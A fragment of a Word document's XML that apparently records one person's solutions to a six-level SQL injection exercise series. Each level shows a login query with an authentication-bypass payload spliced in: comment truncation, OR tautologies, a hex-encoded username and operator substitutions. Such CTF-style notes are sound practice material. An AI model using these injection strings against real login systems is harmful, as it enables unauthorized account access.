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9D03B" w14:textId="2F6CC7BF" w:rsidR="008D4961" w:rsidRDefault="00321257">
      <w:r>
        <w:t>Lv1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB3F2EF" w14:textId="77777777" w:rsidR="008A3438" w:rsidRDefault="008A3438">
      <w:r w:rsidRPr="008A3438">
        <w:t>select * from tb_lv1 where id='admin'#' and pw=''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF9D871" w14:textId="1D5CDDC1" w:rsidR="00321257" w:rsidRDefault="00321257">
      <w:r>
        <w:t>Lv2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26630B10" w14:textId="0AA7051B" w:rsidR="008A3438" w:rsidRDefault="008A3438">
      <w:r w:rsidRPr="008A3438">
        <w:t>select * from tb_lv2 where id='guest' and pw='' or id='admin' and '1'='1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447B88B7" w14:textId="2DA38BF6" w:rsidR="008A3438" w:rsidRDefault="008A3438">
      <w:r>
        <w:t>Lv3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1149C804" w14:textId="6B8E358F" w:rsidR="008A3438" w:rsidRDefault="00150DF4">
      <w:r w:rsidRPr="00150DF4">
        <w:t>select * from tb_lv3 where id='guest' and seq=0 or id=0x61646d696e and true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A99CA5" w14:textId="283EBBF1" w:rsidR="00150DF4" w:rsidRDefault="00150DF4">
      <w:r>
        <w:t>Lv4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B950CCE" w14:textId="7B2A4EEE" w:rsidR="00150DF4" w:rsidRDefault="00150DF4">
      <w:r w:rsidRPr="00150DF4">
        <w:t>select * from tb_lv4 where id='guest' and pw='1' || id='admin' &amp;&amp; true#'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2122F653" w14:textId="5BEFD3DB" w:rsidR="00150DF4" w:rsidRDefault="00A10E04">
      <w:r>
        <w:t>Lv5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9F54CC" w14:textId="7E2B3679" w:rsidR="00A10E04" w:rsidRDefault="00A10E04">
      <w:r w:rsidRPr="00A10E04">
        <w:t>select * from tb_lv5 where id='guest' and pw=''or(id='admin</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A10E04">
        <w:t>')and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A10E04">
        <w:t>(true)#'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD5C7A7" w14:textId="7D35A6E9" w:rsidR="00A10E04" w:rsidRDefault="005A54E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>v6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E51460A" w14:textId="155C5BCB" w:rsidR="005A54E6" w:rsidRDefault="005A54E6">
      <w:r w:rsidRPr="005A54E6">
        <w:t>select * from tb_lv6 where id='admin'#' and pw=''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133A2CCD" w14:textId="77777777" w:rsidR="005A54E6" w:rsidRDefault="005A54E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005A54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57"/>
    <w:rsid w:val="00066452"/>
    <w:rsid w:val="000C6D84"/>
    <w:rsid w:val="00150DF4"/>
    <w:rsid w:val="00321257"/>
    <w:rsid w:val="004A5F92"/>
    <w:rsid w:val="004B0505"/>
    <w:rsid w:val="005A54E6"/>
    <w:rsid w:val="007113B9"/>
    <w:rsid w:val="0085699D"/>
    <w:rsid w:val="008A3438"/>
    <w:rsid w:val="008D4961"/>
    <w:rsid w:val="00962CA1"/>
    <w:rsid w:val="0098129E"/>
    <w:rsid w:val="00A10E04"/>
    <w:rsid w:val="00D4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5823"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2B1344A5-6746-468D-A27A-6A8CDC26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김진욱</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>김진욱</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-06-29T18:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-29T18:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>